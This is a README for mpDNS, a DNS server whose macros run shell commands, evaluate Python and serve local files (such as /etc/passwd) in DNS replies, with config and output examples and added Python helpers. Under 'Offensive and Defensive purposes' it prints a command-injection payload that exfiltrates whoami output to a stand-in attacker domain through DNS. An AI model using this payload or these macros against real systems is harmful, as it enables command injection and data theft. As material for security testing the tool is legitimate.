mpDNS aka multi-purpose DNS server is a simple, configurable “clone & run” DNS server with multiple useful features.

Supported macros:
  {{shellexec::dig google.com +short}} -> Execute shell command and respond with result
  {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code
  {{file::/etc/passwd}} -> Respond with local file contents
  {{resolve}} -> Forward DNS request to local system DNS
  {{resolve::example.com}} -> Resolve example.com instead of original record
  {{echo}} -> Respond with the peer address
  {{shellexec::echo %PEER% %QUERY%}} -> Use of variables

A, CNAME and TXT records
names.db records can be changed without restart/reload with ./mpdns.py -e
Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

Usage:
  ./mpdns.py
  ./mpdns.py -e    -> change names.db records, no restart required
Offensive and Defensive purposes:
  /ping.php?ip=$(dig $(whoami).attacker.com)
  TXT query

Get the code:
  git clone https://github.com/nopernik/mpDNS

Notes:
  TXT records are split into chunks of 256 bytes until the response reaches the maximum allowed 65200b.
  A TXT record with the macro {{file::localfile.txt}} is limited to 65200 bytes.
  test.*.example.com {{resolve::example.com}} macro
  TTL is always set to 0.
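How a long TXT answer is chunked and what a client reassembles from it, as an added Python example (not mpDNS's own code). One caveat it encodes: the note above says 256-byte chunks, but RFC 1035 allows at most 255 data bytes per TXT character-string (one length octet plus the data), so the encoder below rejects anything larger and the chunker defaults to 255; the 65200-byte total cap is the one stated in the notes.

```python
MAX_TXT_BYTES = 65200   # total TXT payload cap stated in the mpDNS notes
MAX_CHARSTRING = 255    # RFC 1035 <character-string>: 1 length octet + up to 255 bytes

def chunk_txt(payload: bytes, chunk_size: int = MAX_CHARSTRING,
              max_bytes: int = MAX_TXT_BYTES) -> list:
    """Truncate payload to max_bytes, then cut it into chunk_size pieces."""
    if not 1 <= chunk_size <= MAX_CHARSTRING:
        raise ValueError("chunk_size must be 1..255 to fit one TXT character-string")
    payload = payload[:max_bytes]
    return [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]

def encode_txt_rdata(chunks: list) -> bytes:
    """Serialise chunks as TXT RDATA: <len><bytes><len><bytes>... (the wire form)."""
    out = bytearray()
    for chunk in chunks:
        if len(chunk) > MAX_CHARSTRING:
            raise ValueError("character-string longer than 255 bytes")
        out.append(len(chunk))
        out += chunk
    return bytes(out)

def decode_txt_rdata(rdata: bytes) -> bytes:
    """Inverse of encode_txt_rdata: what a client reassembles from the answer."""
    pos, parts = 0, []
    while pos < len(rdata):
        n = rdata[pos]
        pos += 1
        if pos + n > len(rdata):
            raise ValueError("truncated character-string in TXT RDATA")
        parts.append(rdata[pos:pos + n])
        pos += n
    return b"".join(parts)

# Constructed sample payload standing in for what {{file::/etc/passwd}} would return.
SAMPLE = b"root:x:0:0:root:/root:/bin/bash\n" * 100   # 3200 bytes, constructed
```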
names.db example:
>> An empty configuration results in empty but valid responses.
>> Unicode domain names are not supported, but they are still caught by the server.
>> For example, мама-сервер-unicode.google.com will be caught but answered with SERVFAIL.

passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
notgoogle.com A {{resolve::google.com}}
Example output with the names.db example:

Regular resolution from DB: dig test.example.com @localhost
;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8
mpDNS output: – Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)

Recursive CNAME resolution: dig c1.example.com @localhost
;; QUESTION SECTION:
;c1.example.com. IN A
;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14
mpDNS output:
>> Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)

Wildcard resolution: dig not-in-db.com @localhost
;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1
mpDNS output: – Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)

Wildcard subdomain resolution: dig wildcard.example.com @localhost
;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7
mpDNS output: – Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)

Forward request macro: dig google.com @localhost
;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)

Forward request of custom domain macro: dig notgoogle.com @localhost
;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)

File contents macro via TXT query: dig txt passwd.example.com @localhost
;; ANSWER SECTION:
passwd.example.com. 0 IN TXT "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:...stripped"
mpDNS output: – Request from 127.0.0.1:38805 -> passwd.example.com. -> 'root:x:0:0:root...(2808)'

Custom python code macro via TXT query: dig txt eval @localhost
;; ANSWER SECTION:
eval. 0 IN TXT "320"
mpDNS output: – Request from 127.0.0.1:33821 -> eval. -> '320'

Shell command macro via TXT query: dig txt shellexec @localhost
;; ANSWER SECTION:
shellexec. 0 IN TXT "root"
mpDNS output: – Request from 127.0.0.1:50262 -> shellexec. -> 'root'
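The record matching and CNAME chasing behind the outputs above, as an added Python example (not mpDNS's own code): it parses a constructed subset of the names.db example, applies the precedence the examples show (exact name, then *.parent, then the bare * catch-all), follows CNAME chains with a depth limit so a looped chain cannot hang the server, and lists which records carry shellexec/eval/file macros, since those run code or read files on the host whenever the name is queried. Macro values are returned verbatim instead of being executed.

```python
# Constructed subset of the names.db example above (an mpDNS config, not mpDNS code).
NAMES_DB = """\
passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
"""
def parse_db(text):
    """(name, TYPE, value) per line; '#' comments and blank lines are dropped."""
    lines = (ln.split("#", 1)[0].strip() for ln in text.splitlines())
    return [(n.lower().rstrip("."), t.upper(), v) for n, t, v in (ln.split(None, 2) for ln in lines if ln)]

def lookup(records, qname, qtype):
    """Exact name beats '*.parent', which beats the bare '*' catch-all."""
    qname = qname.lower().rstrip(".")
    ranks = {}
    for name, rtype, value in records:
        if rtype != qtype:
            continue
        if name == qname:
            ranks[0] = value
        elif name.startswith("*.") and qname.endswith(name[1:]):
            ranks.setdefault(1, value)
        elif name == "*":
            ranks.setdefault(2, value)
    return ranks[min(ranks)] if ranks else None

def resolve(records, qname, qtype="A", max_depth=10):
    """Chase CNAMEs as the log above shows; max_depth stops a CNAME loop. Macros are not executed."""
    answers, name = [], qname.rstrip(".")
    for _ in range(max_depth):
        target = lookup(records, name, "CNAME")
        if target is None:
            break
        answers.append((name, "CNAME", target))
        name = target.rstrip(".")
    value = lookup(records, name, qtype)
    if value is not None:
        answers.append((name, qtype, value))
    return answers

def exec_macro_records(records):
    """Names whose value is a shellexec/eval/file macro: audit these before deploying a names.db."""
    return [n for n, _, v in records
            if v.startswith("{{") and v[2:].split("::", 1)[0].rstrip("}") in ("shellexec", "eval", "file")]
```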